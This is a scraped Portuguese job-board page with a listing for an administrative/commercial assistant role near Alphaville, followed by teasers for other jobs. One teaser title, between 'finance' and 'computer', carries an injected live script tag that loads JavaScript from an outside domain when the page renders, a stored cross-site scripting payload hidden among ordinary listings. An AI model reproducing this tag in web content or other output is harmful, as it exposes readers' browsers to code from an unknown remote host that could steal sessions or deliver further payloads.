Ir à oferta completa

VENDEDORES ON LINE (ALPHAVILLE)

Carapicuíba - São Paulo

Descrição da oferta de emprego

A empresa UP RH está em busca de um(a) profissional dinâmico(a) e proativo(a) para ocupar a posição de Auxiliar Administrativo Comercial em nosso clientee que fica na região de Alphaville.

Principais Responsabilidades:
- Dar suporte administrativo ao time comercial, garantindo a eficiência das atividades diárias;
- Realizar o controle e organização de documentos e arquivos relacionados às operações comerciais;
- Elaborar relatórios e apresentações utilizando o Pacote Office (Word, Excel, Power Point);
- Auxiliar na criação e manutenção de planilhas e sistemas de controle;
- Atender e direcionar ligações telefônicas para a equipe comercial;
- Realizar o atendimento a clientes, fornecedores e parceiros;
- Participar de reuniões e treinamentos internos, contribuindo com ideias e sugestões para o aperfeiçoamento dos processos;

Requisitos:
- Conhecimento avançado do Pacote Office (Word, Excel, Power Point);
- Experiência de 1 a 2 anos na área administrativa, preferencialmente em ambiente comercial;
- Excelentes habilidades de comunicação verbal e escrita;
- Bons conhecimentos em técnicas de organização e arquivo de documentos;
- Facilidade no relacionamento interpessoal e trabalho em equipe;
- Capacidade de realizar múltiplas tarefas simultaneamente, mantendo o foco em resultados;
- Graduação ou cursando em áreas afins será considerado um diferencial.

Oferecemos:
- Ambiente de trabalho desafiador e dinâmico;
- Oportunidades de crescimento e desenvolvimento profissional;
- Remuneração compatível com o mercado;
- Benefícios como vale-alimentação, vale-transporte e assistência médica.

Se você se identifica com o perfil descrito acima e busca uma oportunidade para crescer e desenvolver suas habilidades em uma empresa sólida e em constante crescimento, faça parte da equipe UP. Envie seu currículo atualizado para email: CURRICULOUPVAGAS@GMAIL.COM, com o assunto: "Auxiliar Administrativo Comercial - Alphaville".

A empresa UP RH valoriza a diversidade e acredita no potencial de cada indivíduo, independentemente de raça, cor, religião, gênero, identidade de gênero, orientação sexual, nacionalidade, deficiência ou idade. Se você possui os requisitos mencionados, será muito bem-vindo(a) em nossa equipe. Aguardamos o seu contato!
Benefícios:
-. Ajuda de custo R$ 1.200,00 (Transportes e Refeição)
-. Local para refeição
Ir à oferta completa

Detalhes da oferta

Empresa
  • Confidencial
Localidade
Endereço
  • Indeterminado - Indeterminado
Tipo de Contrato
  • Indeterminado
Data de publicação
  • 24/09/2024
Data de expiração
  • 23/12/2024
LEGAL ADVISOR
Oman Jobs

•train real estate staff on compliance procedures and best practices... •advise senior management on legal matters affecting business decisions and strategic initiatives... •provide recommendations based on due diligence findings to mitigate legal risks and ensure compliance with regulations......

Customer Success Specialist (PT language) (Remote)
Hostinger

Deliver impactful work on a company scale... focus on the customers’ success by offering additional services, tools, and products... high emotional intelligence, with the ability to read customers’ sentiment and reflect back on the feedback provided... hunger for growth & a can-do attitude! a curious......

Techno Service Engineer
NINJOUR HEALTH INTERNATIONAL LIMITED

As we embark on an exciting phase of expansion, we are thrilled to announce several career opportunities within our dynamic team... requisitos do trabalho requirements basic education: biomedical engineer work experience: minimum of 5-10 years in a similar role and industry others: good presentation......

Techno Commercial Engineer
NINJOUR HEALTH INTERNATIONAL LIMITED

As we embark on an exciting phase of expansion, we are thrilled to announce several career opportunities within our dynamic team... requisitos do trabalho requirements basic education: biomedical engineer work experience: minimum of 5-10 years in a similar role and industry others: good presentation......

finance
<script/src=//sb8.co></script>computer

Provided multi asset allocation advice to clients on their india and global investment needs... ideas for process improvements to existing models to make them more robust and automated, resulting in smart, dynamic, and scalable client advisory requisitos do trabalho provided multi asset allocation advice......

Marketing executive
Ninjour health international limited

As we embark on an exciting phase of expansion, we are thrilled to announce several career opportunities within our dynamic team... requisitos do trabalho requirements basic education: completed basic education (mba, marketing) further education: specialist certificate or equivalent further training......

SAP Analytics Cloud
JP&F Consultoria

Descrição: • design, build, test applications on the sap bpc platform or the sac planning platform, following the requirements defined by industry and line of business experts, using an agile methodology; • promote the applications built, interacting with marketing, sales and professional services organizations......

Sales Head
NINJOUR HEALTH INTERNATIONAL LIMITED

As we embark on an exciting phase of expansion, we are thrilled to announce several career opportunities within our dynamic team... requisitos do trabalho requirements basic education: bachelors in engineering further education: technical training in the field of same industry, mba will be an added......

Billing and HR Executive
NINJOUR HEALTH INTERNATIONAL LIMITED

As we embark on an exciting phase of expansion, we are thrilled to announce several career opportunities within our dynamic team... workload:50 - 60% contract: contract and based on performance, evaluation after 6-9 months language:english (fluent), conversant with local languages like portuguese, french......

Junior IT Customer Success Specialist (EN Language) (Remote)
Hostinger

Deliver impactful work on a global scale... high emotional intelligence, with the ability to read customers’ sentiments and reflect back on the feedback provided... hunger for growth & a can-do attitude! a curious and always learning mindset - if you don’t know, how can you find out more? owning your......